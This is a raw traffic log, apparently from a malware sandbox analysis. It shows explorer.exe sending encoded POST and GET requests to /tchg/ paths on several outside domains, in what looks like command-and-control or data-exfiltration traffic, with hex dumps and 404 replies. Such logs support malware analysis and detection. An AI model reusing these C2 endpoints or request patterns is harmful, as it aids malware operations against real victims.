                                                                                                                    Data Ascii: H0N2XsWzXGe7Ft9Yh8zQwuWyemAwrAQ8UQ4omh5QruTvDW4HEmuM7ZRMV-Br38LUii8c1a53IX81W05hxnQ0ACLICmHpyGh93U(zG5~ZZUIL5CqDOXauXpHewWp_3MonU5ytyvgG2owowyDsCk1ypZkgh4cHdJGZ1DV8OFcmZ4T1TW9dYfSVafj8NVrMCP7XrG~hjkWRntsWYA(9~eh6y5AwDix_~FBq3HuTeV3GcdKPNSpl4R~
                                                                                                                    May 30, 2023 11:09:35.587673903 CEST737OUTData Raw: 54 36 50 48 55 76 70 69 74 64 75 49 42 52 42 36 4d 42 61 30 42 79 59 39 5a 7a 78 67 46 4c 66 76 75 31 6a 6f 4a 77 38 45 66 50 63 52 43 35 70 54 43 36 4d 47 72 69 6d 32 6e 42 66 6b 56 57 47 68 59 68 6d 50 73 32 65 70 49 75 32 48 45 4f 72 39 70 74
                                                                                                                    Data Ascii: T6PHUvpitduIBRB6MBa0ByY9ZzxgFLfvu1joJw8EfPcRC5pTC6MGrim2nBfkVWGhYhmPs2epIu2HEOr9ptxbA-N-RPZfoNbIVDse0WoCSgTZi59SAFDxIZBbbwQtOSYNAWZ-ddglU-0c8lYwBef6Lu7rhhUpsFR_BagxY4LONlHRzGT-4MKwtv(SgFgfzOVyph(_qLxesGVnkKJrS4sUKnQsvcNI(vDbJO~RG-~N5TBjEnuzBXp
                                                                                                                    May 30, 2023 11:09:35.587842941 CEST738OUTData Raw: 61 73 78 7a 6b 63 53 38 30 54 39 38 6a 2d 28 4d 68 4d 58 77 61 6b 59 75 28 4e 46 71 61 5a 53 30 35 7a 73 69 32 62 45 76 37 46 42 45 79 34 47 71 58 64 39 6a 6b 65 30 32 28 5f 76 6f 74 4c 64 42 68 68 42 50 6f 4a 5a 43 58 78 69 43 38 61 33 45 6b 65
                                                                                                                    Data Ascii: asxzkcS80T98j-(MhMXwakYu(NFqaZS05zsi2bEv7FBEy4GqXd9jke02(_votLdBhhBPoJZCXxiC8a3Ekegx9Z7LJ0KfuQVA4cp_l3akvy3t~uMRmgR14K9MJDrblEB1CambakNdJmVjt6ijxfktsycFGSi3zeC8eEcI(ouv(_OuUGNz~X4VC2iHuHsevcjwKndMGUlcmwtp~_Anzd4xWzADjqaVgXDiJaWbmcVB5jyRjbUSJvj
                                                                                                                    May 30, 2023 11:09:35.588047028 CEST750OUTData Raw: 38 4c 41 7a 58 4a 68 48 4c 7a 36 47 6e 6a 70 4e 4b 30 4a 69 4a 67 58 6d 47 7a 64 77 6b 7a 34 44 28 66 33 48 45 41 36 47 4d 49 32 72 4b 6c 41 4c 36 63 66 31 54 35 35 79 4c 31 78 44 28 4f 6b 5a 4d 37 38 7a 39 6b 39 50 45 4b 70 62 63 2d 69 72 31 44
                                                                                                                    Data Ascii: 8LAzXJhHLz6GnjpNK0JiJgXmGzdwkz4D(f3HEA6GMI2rKlAL6cf1T55yL1xD(OkZM78z9k9PEKpbc-ir1DrY~4gyKgoUQuE4~E5Qz3wyv3itvHvUX9T2cAHiH7GSDILoUkGdjVqnpxJuZuz2qNCintjFeJxHRTFXkyarQdqM5XZD6nG-ixC9SK6AmpBAbL5WcyLR8wmbytE614P-F7qAD5(kEDKwQWVxPhxO9nlxwfTMtRDqRR2
                                                                                                                    May 30, 2023 11:09:35.866724968 CEST756OUTData Raw: 78 5f 45 43 59 33 4c 32 42 39 28 39 48 74 53 51 45 51 48 51 66 69 76 39 38 73 57 4a 61 33 66 4a 63 30 7a 73 36 4c 58 30 43 2d 32 74 41 51 77 7a 46 2d 69 64 4a 39 46 32 55 2d 36 65 46 33 41 33 61 78 4e 38 4d 4c 61 58 36 6a 58 68 74 54 49 64 5a 62
                                                                                                                    Data Ascii: x_ECY3L2B9(9HtSQEQHQfiv98sWJa3fJc0zs6LX0C-2tAQwzF-idJ9F2U-6eF3A3axN8MLaX6jXhtTIdZbaekdcYkB7gszvriYAUVGrUMLx5SbQJ0S4mm0gzKXuCop0LUPpjJ8OOo3G8WUL9EZ3CUpWu9Rd7CmK0D9inK0KGfgwT3W7IIuBzzn0EZfG_i0nT16yLX3y-k1evGXk4Usb9ts496tBsALXQ3rU8U_d-Gl72GPUYOwH
                                                                                                                    May 30, 2023 11:09:35.866806984 CEST760OUTData Raw: 47 6e 66 34 34 41 39 71 7e 46 72 42 77 72 4f 5a 73 76 6e 50 72 32 28 48 69 63 5a 49 72 2d 50 4e 72 35 28 72 78 5f 47 48 43 4b 66 74 7a 6e 71 6e 53 74 71 69 64 7a 61 6e 64 69 54 6f 6c 39 63 30 44 72 53 57 4a 75 67 61 51 47 6b 4b 79 6e 58 75 58 55
                                                                                                                    Data Ascii: Gnf44A9q~FrBwrOZsvnPr2(HicZIr-PNr5(rx_GHCKftznqnStqidzandiTol9c0DrSWJugaQGkKynXuXU3b(74UJp615U(eJtcdgieRTgmefSXnhfoUEtFudYwVR30mLDDaFMw-ji0cQWeujF~5Peqc6aT4LZQuyOgZ3djLHqXdRJ5h9DdhQICv8HdoBwEiyRyORkSOe-Bdmznmj0bvbM34e0fd~3BUVn8jfQUiYCTuBGeTWmX
                                                                                                                    May 30, 2023 11:09:35.867153883 CEST762OUTData Raw: 61 66 4f 38 77 57 76 42 4f 37 34 5f 58 70 53 41 74 35 28 52 41 6d 59 34 7a 45 34 4e 5a 67 67 54 53 67 61 37 41 59 45 65 4f 74 6d 77 35 77 74 38 68 38 66 6d 31 31 48 70 36 50 4a 42 73 5f 49 35 4c 31 67 67 53 72 35 48 73 6b 35 31 63 46 44 59 31 79
                                                                                                                    Data Ascii: afO8wWvBO74_XpSAt5(RAmY4zE4NZggTSga7AYEeOtmw5wt8h8fm11Hp6PJBs_I5L1ggSr5Hsk51cFDY1y0mwa16WP8dqHiktxCuJa3H7XEo~g74NgpMBEmHPgt3YVpDppvPyQi2No0WOzPUwehtWB4XUsiKYuOExWG4svIo6y2oN-IZF0a81aRJoVTyfwlBupbSAV(1035Lfr0QRvTdM8f85F7Zq-qAVbveCULCwWORN8qSfhg
                                                                                                                    May 30, 2023 11:09:36.148807049 CEST766INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Tue, 30 May 2023 09:09:34 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Last-Modified: Mon, 02 Jul 2018 00:27:42 GMT
                                                                                                                    ETag: W/"afe-56ff9440f72fb"
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b 9e 96 6a 6b cb 23 d5 a8 80 72 a4 71 d8 58 34 e2 1e a8 e0 6c 8e 04 55 8f cd 5b ed 02 0a 9d 80 79 9e ca 52 c1 ce c5 5a 20 69 2e a0 a1 f1 ca d4 3b 95 29 e9 59 61 6e 5b 47 ae 02 bd 56 15 37 a8 07 ae a6 f8 53 70 b1 23 be 32 47 d0 29 42 83 36 1b 41 e6 d2 83 a5 df d1 d2 af e2 86 b8 29 ee 89 ab a0 32 4f 9d 45 b3 ef b1 a8 4e 1d f9 26 7e 13 db e2 6b b1 79 fd 91 b8 81 66 03 86 ce 8f 4b f1 71 1a 60 a8 98 a1 0f f0 c5 16 52 e6 52 0d ba 10 fb a1 15 92 80 56 15 cc 3d dc 78 d4 27 56 9d c8 fe 17 50 76 74 42 19 c5 48 43 fa 19 29 a0 a9 c9 b7 94 4c f2 6c 61 8f d6 80 58 07 a6 84 04 4a ee 30 8f 01 89 f3 75 1a 91 98 aa 6c ba 5c 15 24 37 d1 5c 48 45 9e d7 f9 2a cc 73 f7 bb f4 6b 65 3f fb 41 aa 40 49 9b 60 06 23 d6 80 46 8d f5 a5 48 68 3e 4e bc 39 12 51 07 f7 33 01 1d cd 69 98 af aa 2b e6 60 3f 96 14 35 b9 29 99 72 d1 68 be 49 24 45 44 b6 4b c4 9e 3e a4 67 54 96 bc 97 d5 51 b2 d0 f4 30 f5 75 2a 35 ba 56 c4 9a d0 b5 e6 02 0a 99 47 5d 34 54 ad ea 2e 6b 7d 42 ce 20 93 7e 52 47 27 15 ad 09 ac 71 a0 13 e1 56 c4 fa d8 86 64 ba e6 21 07 b7 42 32 a0 70 79 6c 24 29 da c0 a3 da 46 17 34 94 cf e7 e3 96 8f 6b b9 47 22 18 25 2b 6c 62 27 3e a3 00 f5 95 93 22 89 49 13 05 59 e2 b1 fb a4 c2 16 74 b8 04 7f 76 52 e3 4f 96 40 ef 78 5a 7b b9 35 ec 61 54 1a f0 18 b0 3d c4 9a 78 da b9 2d d6 c5 96 f8 52 ec 1a c6 00 33 29 42 c3 b6 f1 6e 83 b8 14 23 e6 7b 6d b9 18 08 f1 11 f6 5d f4 36 6c 30 b5 dd 60 d3 1c d4 22 bc 90 88 a6 f2 c0 e8 41 40 9f 19 aa e0 98 d1 4c a6 5b 63 dc 85 6c 3c d9 99 45 23 53 97 47 2b 93 49 8f 60 5e d2 a5 75 c0 a1 9c 8f 3e 83 7c cf 59 0e 7c 9f 2e db 75 4e 4d 57 bf 45 3c ae 71 78 d9 af 4c 46 d1 ab e6 6e 02 28 86 dc 69 38 bd 88 dd f9 48 55 a3 8e 68 bf 43 4e e3 5f 34 5e d7 05 24 1e 89 3b e2 ba d8 ed fc 2b ee 8a c7 e2 05 6c c7 f5 d7 36 e3 4d ba 31 95 3f b4 8f fa 74 81 87 7a dc ed 23 7e 32 ad 1b 44 7c b6 d7 b6 57 b2 ab f8 cf c4 9f be 02 ca f7 7a d5 37 d6 99 ae 81 06 94 74 21 39 dd 29 2c aa 4b e9 01 51 38 13 97 78 61 f4 ea 1a d4 25 39 73 7b db 9a 8c c1 a2 51 b4 e3 6f 2f 7c 83 6d 75 0d 31 8a f2 0b 07 ef 2e 9d 43 d4 2d 99 72 8a e1 5b
                                                                                                                    Data Ascii: 519VoG>{aJ%fc'qJ-Jj;wuc2SPI6MK(*&Qfg^'{})8:sgQ=jxe(ZR@?aqdN;b?k"4<R@GicE[id:ha~D|v$g|4}Q;NVaQ:qc3'OW@Rs7Y2O^ruPF{V`c#5ZD6?"!hpKZhFMUX@[jk#rqX4lU[yRZ i.;)Yan[GV7Sp#2G)B6A)2OEN&~kyfKq`RRV=x'VPvtBHC)LlaXJ0ul\$7\HE*ske?A@I`#FHh>N9Q3i+`?5)rhI$EDK>gTQ0u*5VG]4T.k}B ~RG'qVd!B2pyl$)F4kG"%+lb'>"IYtvRO@xZ{5aT=x-R3)Bn#{m]6l0`"A@L[cl<E#SG+I`^u>|Y|.uNMWE<qxLFn(i8HUhCN_4^$;+l6M1?tz#~2D|Wz7t!9),KQ8xa%9s{Qo/|mu1.C-r[
                                                                                                                    May 30, 2023 11:09:36.148870945 CEST766INData Raw: 2c cf 6a b1 9e 2d 17 25 39 f2 2e 02 9e f2 5f b1 12 c8 3b 8a 54 cb 67 ef 05 05 3c b4 6b ae 2c 2e 89 ab e2 96 58 e3 37 f9 df fc 0b be 0e bf 77 c5 13 38 8d ab fc e1 ea 15 7e 9f 5f e1 3b fc 29 bf c5 77 f9 8f 52 d7 59 02 50 39 ed df 44 8e 87 c3 b0 64
                                                                                                                    Data Ascii: ,j-%9._;Tg<k,.X7w8~_;)wRYP9Ddiu).mswRuma`_lVOLW61oVke_$qm]UY~x?'=:-sX[J{m/W~?,;s:


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    3192.168.11.2049762109.123.121.24380C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:08:09.004703045 CEST278OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.minskadue.xyz
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 187
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.minskadue.xyz
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.minskadue.xyz/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 4f 4c 48 71 66 47 78 6c 45 7a 4a 70 4c 5f 71 71 44 36 4a 50 34 79 49 61 38 7a 59 50 64 59 78 46 54 70 57 48 38 70 71 47 74 4d 4c 6c 4c 76 57 38 6b 6a 28 51 49 5a 33 76 78 36 38 33 34 6c 56 74 37 36 4f 59 6d 6d 76 56 30 61 44 56 33 45 57 48 45 70 73 4a 34 51 7e 36 4b 36 72 32 42 59 63 6e 55 63 57 72 72 6e 31 33 54 52 5a 55 56 57 38 65 74 47 53 53 66 31 55 32 4d 32 56 46 36 38 42 4f 64 52 77 41 67 63 7a 30 4a 79 4f 30 7e 75 6b 33 6e 61 6a 68 74 4c 64 63 61 37 33 4c 6b 59 62 49 57 69 38 73 66 4c 72 73 53 7a 56 75 78 53 6c 76 62 77 29 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=OLHqfGxlEzJpL_qqD6JP4yIa8zYPdYxFTpWH8pqGtMLlLvW8kj(QIZ3vx6834lVt76OYmmvV0aDV3EWHEpsJ4Q~6K6r2BYcnUcWrrn13TRZUVW8etGSSf1U2M2VF68BOdRwAgcz0JyO0~uk3najhtLdca73LkYbIWi8sfLrsSzVuxSlvbw).
                                                                                                                    May 30, 2023 11:08:09.092273951 CEST278INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Tue, 30 May 2023 09:08:09 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    30192.168.11.2049789183.90.238.4380C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:09:38.090861082 CEST767OUTGET /tchg/?O0qEM=oRufhoY+bc3ycM+VgiODBrp+vj6j24zBH4XRbixJn1DYBt5l7xCYw/uqkQ1xxa9R7WiXu6y4y7mJHWOjUCQ2GcjHOqMUPQqZlA==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1
                                                                                                                    Host: www.dkansai-cp.com
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:
                                                                                                                    May 30, 2023 11:09:38.359308004 CEST768INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Tue, 30 May 2023 09:09:37 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 2814
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Last-Modified: Mon, 02 Jul 2018 00:27:42 GMT
                                                                                                                    ETag: "afe-56ff9440f72fb"
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 37 70 78 3b 0a 7d 0a 70 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a
                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="ja"><head><meta charset="EUC-JP" /><title>404 File Not Found</title><meta name="copyright" content="Copyright XSERVER Inc."><meta name="robots" content="INDEX,FOLLOW" /><meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=1.0"><style type="text/css">* { margin: 0; padding: 0;}img { border: 0;}ul { padding-left: 2em;}html { overflow-y: scroll; background: #3b79b7;}body { font-family: "", Meiryo, " ", "MS PGothic", " Pro W3", "Hiragino Kaku Gothic Pro", sans-serif; margin: 0; line-height: 1.4; font-size: 75%; text-align: center; color: white;}h1 { font-size: 24px; font-weight: bold;}h1 { font-weight: bold; line-height: 1; padding-bottom: 20px; font-family: Helvetica, sans-serif;}h2 { text-align: center; font-weight: bold; font-size: 27px;}p { text-align: center; font-size: 14px; margin: 0; padding: 0; color: white;}
                                                                                                                    May 30, 2023 11:09:38.359396935 CEST769INData Raw: 2e 65 78 70 6c 61 69 6e 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 66 66 66 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 66 66 66 3b 0a 20 20 20 20
                                                                                                                    Data Ascii: .explain { border-top: 1px solid #fff; border-bottom: 1px solid #fff; line-height: 1.5; margin: 30px auto; padding: 17px;}#cause { text-align: left;}#cause li { color: #666;}h3 { letter-spacing: 1px; f
                                                                                                                    May 30, 2023 11:09:38.359451056 CEST770INData Raw: a4 bf a5 da a1 bc a5 b8 a4 cf b8 ab a4 c4 a4 ab a4 ea a4 de a4 bb a4 f3 a4 c7 a4 b7 a4 bf a1 a3 3c 2f 68 32 3e 0a 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 65 78 70 6c 61 69 6e 22 3e a4 b3 a4 ce a5 a8 a5 e9 a1 bc a4 cf a1 a2 bb d8 c4 ea a4 b7 a4
                                                                                                                    Data Ascii: </h2> <p class="explain"></p> <h3></h3> <div id="white_box"> <div id="cause"> <ul>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    31192.168.11.204979084.32.84.3280C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:09:43.450088978 CEST771OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.comoparardefumar.website
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 187
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.comoparardefumar.website
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.comoparardefumar.website/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 37 35 62 76 39 62 61 59 75 68 35 6e 73 30 78 57 67 44 46 37 65 62 50 34 37 73 64 4c 4f 57 62 2d 39 4d 59 44 65 54 6d 4e 4d 71 34 56 32 63 30 38 50 4c 47 56 4b 67 49 36 46 37 31 62 7a 4c 64 56 30 5f 72 79 67 50 72 66 53 56 6c 5a 55 63 35 77 63 6e 4d 54 47 41 4b 49 72 6e 67 47 74 38 54 55 55 43 6f 61 77 64 58 56 4f 42 34 64 66 71 77 68 74 57 48 59 4d 4f 66 42 4d 6c 4f 58 58 74 69 36 47 49 7a 59 43 6f 66 31 48 6c 74 33 79 6c 41 79 4d 48 71 37 44 6b 57 6a 7a 59 30 2d 71 63 45 33 4c 74 6c 59 37 56 62 36 51 77 64 51 57 69 68 69 6d 77 29 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=75bv9baYuh5ns0xWgDF7ebP47sdLOWb-9MYDeTmNMq4V2c08PLGVKgI6F71bzLdV0_rygPrfSVlZUc5wcnMTGAKIrngGt8TUUCoawdXVOB4dfqwhtWHYMOfBMlOXXti6GIzYCof1Hlt3ylAyMHq7DkWjzY0-qcE3LtlY7Vb6QwdQWihimw).


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    32192.168.11.204979184.32.84.3280C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:09:46.008224010 CEST772OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.comoparardefumar.website
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 527
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.comoparardefumar.website
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.comoparardefumar.website/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 37 35 62 76 39 62 61 59 75 68 35 6e 71 55 68 57 6d 6b 52 37 4f 4c 50 37 6e 38 64 4c 48 32 62 36 39 4d 55 44 65 53 54 4b 4d 34 63 56 31 39 45 38 65 5f 53 56 4a 67 49 36 4e 62 31 65 72 72 64 65 30 5f 6e 51 67 4e 28 66 53 56 78 5a 56 76 78 77 61 58 4d 51 65 77 4b 4a 38 58 67 46 70 38 54 65 55 46 67 73 77 66 72 56 4f 77 6b 64 65 76 45 68 70 48 48 58 62 65 66 44 45 46 4f 57 63 4e 69 4f 47 49 76 68 43 70 58 44 48 54 64 33 7a 46 67 79 50 48 71 36 61 45 57 75 73 6f 31 5f 71 38 46 54 4a 2d 56 37 69 32 33 6c 5a 43 34 38 63 7a 77 73 35 2d 73 6d 37 45 69 6d 43 61 57 34 36 6e 45 63 37 66 66 31 39 78 49 52 30 79 49 56 4c 49 78 61 69 4e 6e 63 4a 58 50 68 63 67 35 62 74 34 33 56 4c 53 39 7a 62 5a 58 71 6d 59 7a 72 32 46 5a 62 46 38 54 62 6f 32 32 70 7e 49 53 74 4a 54 52 37 73 44 72 57 33 63 4a 6d 57 4a 4b 38 44 78 6a 72 50 74 62 6c 62 52 78 67 6f 6f 69 62 7a 44 45 45 49 63 35 5a 52 48 32 43 66 4f 67 38 4d 38 31 6e 6d 7a 37 47 5a 36 6f 38 48 68 78 46 52 4c 51 64 4f 59 73 49 35 51 4b 63 4b 53 59 4f 57 6f 38 4a 56 31 42 36 68 35 49 32 72 6a 6a 4a 57 55 56 4d 35 58 77 71 68 39 4e 39 48 6d 6e 48 7a 41 6a 4f 75 55 45 43 35 5a 42 67 79 43 74 47 56 38 6e 53 7e 35 30 41 6e 51 39 58 69 58 51 53 45 38 48 63 55 75 50 34 50 48 65 57 6a 44 30 61 35 30 52 73 65 54 28 30 49 50 42 61 6a 65 5a 49 73 72 43 43 51 49 6f 39 72 53 4b 6d 4f 37 41 69 59 54 78 4b 69 47 33 57 58 34 6e 43 30 4f 43 37 31 62 38 47 39 55 64 69 72 50 66 57 6b 66 52 4b 42 45 4e 65 53 71 42 48 63 6a 32 38 6b 4a 6a 47 28 46 6c 6a 6b 6a 41 6b 7a 67 49 37 78 77 46 51 67 6b 6d 57 44 63 78 35 77 61 34 2e 00 00 00 00 00 00 00 00
